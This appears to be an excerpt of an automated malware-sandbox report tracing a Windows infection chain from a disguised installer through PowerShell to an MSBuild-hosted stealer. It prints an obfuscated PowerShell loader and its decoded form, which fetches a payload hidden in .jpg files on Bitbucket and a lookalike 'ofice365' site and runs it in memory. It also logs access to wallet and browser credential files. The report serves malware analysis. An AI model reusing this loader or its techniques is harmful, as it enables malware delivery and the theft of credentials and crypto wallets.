                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zwbm@gc@z@bm@gy@zgbm@gy@zgbm@gy@zgbm@gy@zw@v@gc@z@bm@gc@z@bm@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@l@@g@cc@a@b0@hq@c@bz@do@lw@v@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qg
b5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@ck@i@b7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@kw@9@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bi@ge@cwbl@dy@n@bm@gu@bgbn@hq@a@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@cJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,12_2_0042EE28
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,12_2_0042E0AC
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B9E875 cpuid 13_2_02B9E875
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: GetLocaleInfoA,11_2_0040520C
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: GetLocaleInfoA,11_2_00405258
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: GetLocaleInfoA,12_2_00408578
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: GetLocaleInfoA,12_2_004085C4
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                            Source: C:\Users\user\Desktop\soft.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,12_2_00458670
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_004026C4 GetSystemTime,11_2_004026C4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00455644 GetUserNameA,12_2_00455644
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00405CF4 GetVersionExA,11_2_00405CF4
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                            Source: svchost.exe, 00000006.00000002.2528094804.000001C52FB02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: svchost.exe, 00000006.00000002.2528094804.000001C52FB02000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2282061438.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: MSBuild.exe, 00000017.00000002.2282661170.0000000000CCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dows Defender\MsMpeng.exe
                            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

Source: Yara match File source: 5.2.soft.exe.9e18000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9f2c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.a122000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9f00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.soft.exe.a122000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.soft.exe.9e44000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1723674731.0000000009E44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1724312184.0000000009F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4600, type: MEMORYSTR
Source: Yara match File source: 23.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2274119949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000D.00000002.2540207459.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2537786569.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ssdtoolbox.exe PID: 2236, type: MEMORYSTR
Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000012.00000002.2335459664.00007FFAAC430000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
